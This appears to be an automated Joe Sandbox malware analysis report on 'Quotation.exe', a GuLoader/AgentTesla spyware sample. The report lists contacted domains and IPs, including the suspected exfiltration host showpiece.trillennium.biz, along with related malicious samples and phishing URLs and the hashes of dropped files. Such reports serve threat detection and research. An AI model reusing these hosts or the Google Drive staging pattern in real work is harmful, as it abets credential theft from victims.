            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Process Injection
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Quotation.exe66%ReversingLabsWin32.Trojan.GuLoader
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://showpiece.trillennium.biz0%Avira URL Cloudsafe
            http://mail.showpiece.trillennium.biz0%Avira URL Cloudsafe
            http://x1.i.len0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.186.78
            truefalse
              high
              drive.usercontent.google.com
              172.217.18.1
              truefalse
                high
                api.ipify.org
                172.67.74.152
                truefalse
                  high
                  showpiece.trillennium.biz
                  67.23.226.139
                  truetrue
                    unknown
                    mail.showpiece.trillennium.biz
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://showpiece.trillennium.bizQuotation.exe, 00000006.00000002.2801542235.00000000383DC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.google.comQuotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://api.ipify.orgQuotation.exe, 00000006.00000002.2801542235.0000000038361000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://drive.google.com/;Quotation.exe, 00000006.00000002.2780628654.0000000007C07000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://r11.o.lencr.org0#Quotation.exe, 00000006.00000002.2801542235.00000000383E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802185922.000000003A410000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802098526.000000003A38B000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://mail.showpiece.trillennium.bizQuotation.exe, 00000006.00000002.2801542235.00000000383DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://x1.c.lencr.org/0Quotation.exe, 00000006.00000002.2801542235.00000000383E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802185922.000000003A410000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://x1.i.lencr.org/0Quotation.exe, 00000006.00000002.2801542235.00000000383E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802185922.000000003A410000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://drive.usercontent.google.com/Quotation.exe, 00000006.00000003.2506545881.0000000007C89000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2780628654.0000000007C72000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://apis.google.comQuotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://nsis.sf.net/NSIS_Error...Quotation.exe, 00000000.00000000.1529758782.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Quotation.exe, 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Quotation.exe, 00000006.00000000.2328570673.0000000000408000.00000002.00000001.01000000.00000003.sdmpfalse
                                          high
                                          https://api.ipify.org/tQuotation.exe, 00000006.00000002.2801542235.0000000038361000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQuotation.exe, 00000006.00000002.2801542235.0000000038361000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://x1.i.lenQuotation.exe, 00000006.00000003.2574356823.000000003A3AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://drive.google.com/CQuotation.exe, 00000006.00000002.2780628654.0000000007C07000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://r11.i.lencr.org/0Quotation.exe, 00000006.00000002.2801542235.00000000383E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802185922.000000003A410000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802098526.000000003A38B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  142.250.186.78
                                                  drive.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  67.23.226.139
                                                  showpiece.trillennium.bizUnited States
                                                  33182DIMENOCUStrue
                                                  172.217.18.1
                                                  drive.usercontent.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  172.67.74.152
                                                  api.ipify.orgUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1553547
                                                  Start date and time:2024-11-11 11:47:17 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 8m 16s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:9
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:Quotation.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@3/12@4/4
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 86%
                                                  • Number of executed functions: 148
                                                  • Number of non-executed functions: 18
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: Quotation.exe
                                                  TimeTypeDescription
                                                  05:50:12API Interceptor208x Sleep call for process: Quotation.exe modified
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  67.23.226.1393Pd480eWHA.exeGet hashmaliciousAgentTeslaBrowse
                                                    Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      COTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                          Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              Revised PI 28 08 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                PI 22_8_2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  COTIZACION 19 08 24.exeGet hashmaliciousAgentTeslaBrowse
                                                                    pago.exeGet hashmaliciousAgentTeslaBrowse
                                                                      172.67.74.1522b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                      • api.ipify.org/
                                                                      Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
                                                                      • api.ipify.org/
                                                                      67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                      • api.ipify.org/
                                                                      Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                      • api.ipify.org/
                                                                      4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                                                                      • api.ipify.org/
                                                                      y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
                                                                      • api.ipify.org/
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • api.ipify.org/
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • api.ipify.org/
                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                      • api.ipify.org/
                                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                      • api.ipify.org/
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      api.ipify.orgCreal.exeGet hashmaliciousCreal StealerBrowse
                                                                      • 104.26.13.205
                                                                      #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeGet hashmaliciousBlank Grabber, Creal StealerBrowse
                                                                      • 104.26.12.205
                                                                      ypauPrrA08.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                                      • 104.26.13.205
                                                                      Sara.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                      • 172.67.74.152
                                                                      Sara.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.26.12.205
                                                                      6G1YhrEmQu.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                      • 104.26.13.205
                                                                      pago de PEDIDO PROFORMA.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 104.26.12.205
                                                                      https://thrifty-wombat-mjszmd.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                                      • 172.67.74.152
                                                                      https://www.canva.com/design/DAGVsvWsNbI/iZzU0BNPZvRGZSXgumDARw/view?utm_content=DAGVsvWsNbI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                      • 104.26.12.205
                                                                      TtyCIqbov8.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 172.67.74.152
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      DIMENOCUShiss.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                      • 198.136.58.114
                                                                      Updated Document-9875488675.pdfGet hashmaliciousCaptcha PhishBrowse
                                                                      • 67.23.254.53
                                                                      3Pd480eWHA.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 67.23.226.139
                                                                      Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      • 67.23.226.139
                                                                      COTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      • 67.23.226.139
                                                                      Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 67.23.226.139
                                                                      Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      • 67.23.226.139
                                                                      Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      • 67.23.226.139
                                                                      https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.brGet hashmaliciousHTMLPhisherBrowse
                                                                      • 107.161.183.172
                                                                      http://prabal-gupta-lcatterton-com.athuselevadores.com.br/Get hashmaliciousHTMLPhisherBrowse
                                                                      • 107.161.183.172
                                                                      CLOUDFLARENETUShttps://url.uk.m.mimecastprotect.com/s/kDIoCE937cZ18nFwhvH7E_ay?domain=eye.sbc31.netGet hashmaliciousHTMLPhisherBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 188.114.96.3
                                                                      Scan112024.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 188.114.97.3
                                                                      DHL 984468477.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 188.114.97.3
                                                                      Consulta de encomenda N#U00ba TM06-Q2-11-24.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      PO No-5100002069 Sr. No. 11 & PO No-5100002072 Sr. No. 8,10,17..exeGet hashmaliciousFormBookBrowse
                                                                      • 172.67.177.220
                                                                      SAFAIR - MDE_File_Sample_c4fda6eee21550785a1c89ce291a2d3072e0ed9b.zipGet hashmaliciousUnknownBrowse
                                                                      • 1.1.1.1
                                                                      file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                      • 188.114.96.3
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      3b5074b1b5d032e5620f69f9f700ff0eDDH_LP (1).exeGet hashmaliciousUnknownBrowse
                                                                      • 172.67.74.152
                                                                      seethebstpricewithbestthinghappingwithgoodnews.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                      • 172.67.74.152
                                                                      seethebestthingsneedtodowithgreatthingshappenedonheretosee.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                      • 172.67.74.152
                                                                      DDH_LP (1).exeGet hashmaliciousUnknownBrowse
                                                                      • 172.67.74.152
                                                                      Scan112024.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 172.67.74.152
                                                                      Request for Quotation 11-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 172.67.74.152
                                                                      074c592b-5cc0-496d-b3fa-45a09d4363ce#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 172.67.74.152
                                                                      Consulta de encomenda N#U00ba TM06-Q2-11-24.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 172.67.74.152
                                                                      Intesa.Sanpaolo.Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                                                                      • 172.67.74.152
                                                                      ORDER#73672-MAT373674849083403894808434PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 172.67.74.152
                                                                      37f463bf4616ecd445d4a1937da06e19Request for Quotation 11-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 142.250.186.78
                                                                      • 172.217.18.1
                                                                      074c592b-5cc0-496d-b3fa-45a09d4363ce#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 142.250.186.78
                                                                      • 172.217.18.1
                                                                      rPO3799039985.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 142.250.186.78
                                                                      • 172.217.18.1
                                                                      Rechnung_10401.jsGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 142.250.186.78
                                                                      • 172.217.18.1
                                                                      A322mb7u3h.exeGet hashmaliciousUnknownBrowse
                                                                      • 142.250.186.78
                                                                      • 172.217.18.1
                                                                      C6y77dS3l7.exeGet hashmaliciousUnknownBrowse
                                                                      • 142.250.186.78
                                                                      • 172.217.18.1
                                                                      Wiu8X6685m.exeGet hashmaliciousUnknownBrowse
                                                                      • 142.250.186.78
                                                                      • 172.217.18.1
                                                                      WUa1Tm8Dlv.exeGet hashmaliciousUnknownBrowse
                                                                      • 142.250.186.78
                                                                      • 172.217.18.1
                                                                      XOr3Kqyo9n.exeGet hashmaliciousStealcBrowse
                                                                      • 142.250.186.78
                                                                      • 172.217.18.1
                                                                      AcroCEF.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 142.250.186.78
                                                                      • 172.217.18.1
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dllQuotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        COTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                            1364. 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                              Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                Quote_220072.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      PO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        PO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          Process:C:\Users\user\Desktop\Quotation.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):12288
                                                                                          Entropy (8bit):5.97694153396788
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:acA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:RR7SrtTv53tdtTgwF4SQbGPX36wJMw
                                                                                          MD5:D6F54D2CEFDF58836805796F55BFC846
                                                                                          SHA1:B980ADDC1A755B968DD5799179D3B4F1C2DE9D2D
                                                                                          SHA-256:F917AEF484D1FBB4D723B2E2D3045CB6F5F664E61FBB3D5C577BD1C215DE55D9
                                                                                          SHA-512:CE67DA936A93D46EF7E81ABC8276787C82FD844C03630BA18AFC3528C7E420C3228BFE82AEDA083BB719F2D1314AFAE913362ABD1E220CB364606519690D45DB
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                          • Filename: COTIZACION.exe, Detection: malicious, Browse
                                                                                          • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                          • Filename: 1364. 2024.exe, Detection: malicious, Browse
                                                                                          • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                          • Filename: Quote_220072.exe, Detection: malicious, Browse
                                                                                          • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                          • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                          • Filename: PO-000172483.exe, Detection: malicious, Browse
                                                                                          • Filename: PO-000172483.exe, Detection: malicious, Browse
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@t.]!..]!..]!...T..Z!...Y..Z!..]!..I!...T..Y!...T..\!...T..\!...T..\!..Rich]!..................PE..L.....*c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\Desktop\Quotation.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):35
                                                                                          Entropy (8bit):4.264578373902383
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:apWPWPjNLCNHiy:UPRCNHiy
                                                                                          MD5:58AC0B5E1D49D0EE1AED2FE13FAE6C7A
                                                                                          SHA1:02C8384573D47CA39F2E2ACA32B275861EC59A93
                                                                                          SHA-256:624F49944CB84ED51FECABCD549AE3B47152F9A20C4A95E93C8B007AEFE9FEAB
                                                                                          SHA-512:8F5F062D6EBB8312DA4AD4F5AF077B1EAA2E14244823F15E6A87A9E48C7172CC1EA5AB691D3B4F9D8F8E0605F9CB3AA06590B4389820DA531633D9915B988FFC
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:[broadspread]..slyngvrk=houghband..
                                                                                          Process:C:\Users\user\Desktop\Quotation.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):482519
                                                                                          Entropy (8bit):1.2446382063037653
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:+yiLw81PnsncGiIsTVODPOqNbsVEVWZkZA4:G/Pne9iIyVODPsVpZkZA4
                                                                                          MD5:1D099F6122F4B7C8A78925726B59E5C3
                                                                                          SHA1:EEA154E31FF04CD1A2CED0193F7633ED219CFA47
                                                                                          SHA-256:1B6DC1EAD079DB05B998725B154E803E6E1504E7E5B49C5611D55E018CD45E6D
                                                                                          SHA-512:F31F0A285C5A6EB2236CCD49A8BF939E46624F270E0270FC4C5640B37684BC1C7780C5350F778DA8E9D0B8CD25320C1909A9CD937F15BB3A7CDDBCEEE94C47FB
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:.....................................FP.l...........-...............#............W.............a...............3..........1..i.k.............;......H.............................2..............X..H.....}..................................................M.........M........................................................8......_............8....................................................................?...................................................................................J..............................................T.....................................................B..........................7.....................4........o..P................!........................................................................q..........................................................................l............................;...................................q...............................g.......mm......................................n.......................P.........
                                                                                          Process:C:\Users\user\Desktop\Quotation.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):340974
                                                                                          Entropy (8bit):1.254605943274635
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:AgVdAd1etxyZmQhZgJwrQTTwKuiTGrJqCoIEsPkZnFFSKsOI4v/3n35lB3LiADa4:5TxLsV5IjQ3xx12
                                                                                          MD5:49BE0E06F2E4F0CCFFB46426EE262642
                                                                                          SHA1:FF9C56C31A824E4CA087705C23D01D288FE34239
                                                                                          SHA-256:A55DAC07FB586D4B64F0DDF812087A2EEEC6F5286D9BC73AD648ED3220ABDD3A
                                                                                          SHA-512:27E9D035708943DD257186457C15488C9405747FC77F7C76760C96EE011C239F9FA53B5DA17958038FB2BA1C4E27E643E7924A37E6164E250B9F45A109D92E53
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:.....................................n.........A...5............K.................C.........a............>....................................................................................p...................................................................................................................W.......................................m.........................................M..........................'......i.............................................................................................4....................................}....................................................................................................................................................x...........S..................'..y............................................../..........................................M..................Z.................................V.......................................=.....N...............................n..................................|. .....
                                                                                          Process:C:\Users\user\Desktop\Quotation.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):392462
                                                                                          Entropy (8bit):1.241128723454179
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:jby0EUrStmwpKcx/orVcYZ+M3ok1I7vZFCDrlv2UV5t3votN6cGia46OGj3OkYSk:FaZaukRTadSdbrJ5N275Ea3nRYS3r
                                                                                          MD5:F130EC3095DBECEDC791D8C58A59040C
                                                                                          SHA1:DAD2300B487F31F199520E1B41AB02B7D677B352
                                                                                          SHA-256:A56351ED69A301F5D9D89B6530280B7A85F998A806E1648911C37B6983BA9426
                                                                                          SHA-512:8599200F472F2D59390E8F2C497331640B12AB9FAF71817160C6D450EDF8A99F78CEF28CC3B57581D6AECFC1EC90A49947A6685C606321B6EE300D483C838360
                                                                                          Malicious:false
                                                                                          Preview:..................J......-..............K....e..........1......................D....................................?............K.V..............................................\....3.......................................L.................................A.........i........,...........................P.{............................................................r................................................V........................................e............&.................................................7...................k.........<...s................).................................................x...............................j................................`.................b.................G.......w..........................................{.........................................G..............................:.................#..............................................<..O......^..........O..............................7..\................................
                                                                                          Process:C:\Users\user\Desktop\Quotation.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):433786
                                                                                          Entropy (8bit):1.255949132332751
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:NFXORpsqJLOaVDzzoIgUPRGRoYNxHVxyczaUz4pP9Nom56I4tY6UBh1Yc88LaAQo:TUAoYxPzqoIzdwWR1+/24cwZXeCPiIBo
                                                                                          MD5:53FF1A157920AE92C9BF891D453D6B65
                                                                                          SHA1:B7BF3B7B16048F38132D8ACCA841130D73DB44C3
                                                                                          SHA-256:FAD1B5E641DC44B5A51048470D4E0FB47664CF2B994CEA24304495D99323B9DE
                                                                                          SHA-512:E739381C24627F89255DB55B2DA39A09F055A322C577C3604BA048FB2C817AE7F63B12131F8461491F6140953FB33DD94EB66D8CB3B13B36717143342CE270AF
                                                                                          Malicious:false
                                                                                          Preview:......................................j......................................."t......... .............Z..........................................+...o..G.......d......................................................................................X................5....................................F.........'.....................................................U...............................\............Y............)..............................d..D....................................................%.................................................Y..#.......................................................................................................................^.........................................j...........w...............................................n.....................................V..........i.............................................6...7..........*.........................................................................H.............................
                                                                                          Process:C:\Users\user\Desktop\Quotation.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):374902
                                                                                          Entropy (8bit):1.250991222921627
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:XkYzjcLYszRzU5n1C900tMkYQx+gnpovYHO:XkYz4DzQB5sYYH
                                                                                          MD5:169115C751DDA5E021E8C86E8454B26D
                                                                                          SHA1:5A8254634C0C726BB18E42E626EAEB581D532DCD
                                                                                          SHA-256:ACCD4911D88E808AED4A2AA27394628C62574810B0B47977B7103A246FDF2A10
                                                                                          SHA-512:2B643014E8623CADBA7CE78B91D3C751D60FCBF3FA69FA26F29A14E55679FC6A5C2074834B2496773A1756E3172EC7C898E2DF29CB4A0513DBF8BC0DCDDA7E04
                                                                                          Malicious:false
                                                                                          Preview:.......].....................................................S....................................^.4....................=.b.........................................................................o....O..................O........................t..............................I.................................................................;......................................m...................A.....................................i.........................................=...............................................................................................u..&...............................v............=................v...............p...............O.......'.............................K........................;............m......P................x.f....................K[.(..A..........#........................J..L........................i........................X................................................................................N..............f.........
                                                                                          Process:C:\Users\user\Desktop\Quotation.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):489048
                                                                                          Entropy (8bit):1.245615736901525
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:HMtjgMjMD1whyMu1IXCVAcFNpruXO+nBJH:stjgmYi03XDL+nBJ
                                                                                          MD5:B4FB425BAF217F31E91AAB39ABF66DCD
                                                                                          SHA1:03DE3BD0F923AB14213B6C4461C5CA73A0A6371C
                                                                                          SHA-256:4BC57A47B82B63EC20B393F65F3585EB81FE3F7748229CD19DEC8FE8A41D67C3
                                                                                          SHA-512:E72395FD6098130EFD543C5941781A1AA80FCE17C7701CB40FA8874271E0D43E0F7F082EBF5D458181287DE41CF4B34F88DCAABE84D8AD51003EF5DA1495D871
                                                                                          Malicious:false
                                                                                          Preview:.............9.....................A..............Z...........=.........................................................h...'.........................................................L..............................................p..C...........................,...................................p..........S............................................................................{............................................(.........C...^...........*............................U.........~................................................z.....................................A................................................]..........i.............,....................................g..............................3......K.....................u..............................................................H.t....................................................................................................................`....*.........................)1.............q..............4....
                                                                                          Process:C:\Users\user\Desktop\Quotation.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):371
                                                                                          Entropy (8bit):4.247837387326688
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:r8pLNAsEyv1WABlvMW9uu+IXvVJyQXPhXOQemtNxgFUvNwmA6AQOp2jMPA9cnb:ruJAOgABlQuTXbyKhXOLmtLgHmFOYjMV
                                                                                          MD5:46003C65AA12A0EBE55662F0141186DC
                                                                                          SHA1:739652C3375018DAFFB986302A7D3E8D32770B41
                                                                                          SHA-256:2EA079DEDE1B356842C5F5E0751B5E2B6565FDED65DAFB59A73D170C002ABB27
                                                                                          SHA-512:59D394789F9EECE97873D56AEA64F353D3E13E007E4ACBD396AC76CB68E91494EB65888049EF05CBE9B20597ADADCC960D067F90AAD3EA5AA46AC3A82F5B82FD
                                                                                          Malicious:false
                                                                                          Preview:degageredes indtgters commencing subfunctional rubiator startkatalogernes dismasted outsport..surkaalen syndedes turtledoving,leddelsestes obs jernholdigt normsammenbruds.azotite hestesko hvilkes snrkels enstatitite nappes,slangudtrykkets squills consonantising windchest interpretableness lynkrigen..vinders drikkegildet orgal snakkehjrnets responders etageejendommens..
                                                                                          Process:C:\Users\user\Desktop\Quotation.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):371283
                                                                                          Entropy (8bit):7.672637395473041
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:B0DsdxHOonHNzzc7TH8eLNpzi7EXXLNwk5ZdloCV1PA4AZ2mvDq:Kyxt48eLLi2lllrPA48/O
                                                                                          MD5:D22E3279808203240637B86177A5923E
                                                                                          SHA1:95F285E86FDD84BBA740BFCEED2A8B1FFFD38C90
                                                                                          SHA-256:C5357EAD0E6BE3B4632516BCA653EDF8EDC122C368F80BBECD7317801FCDFAA8
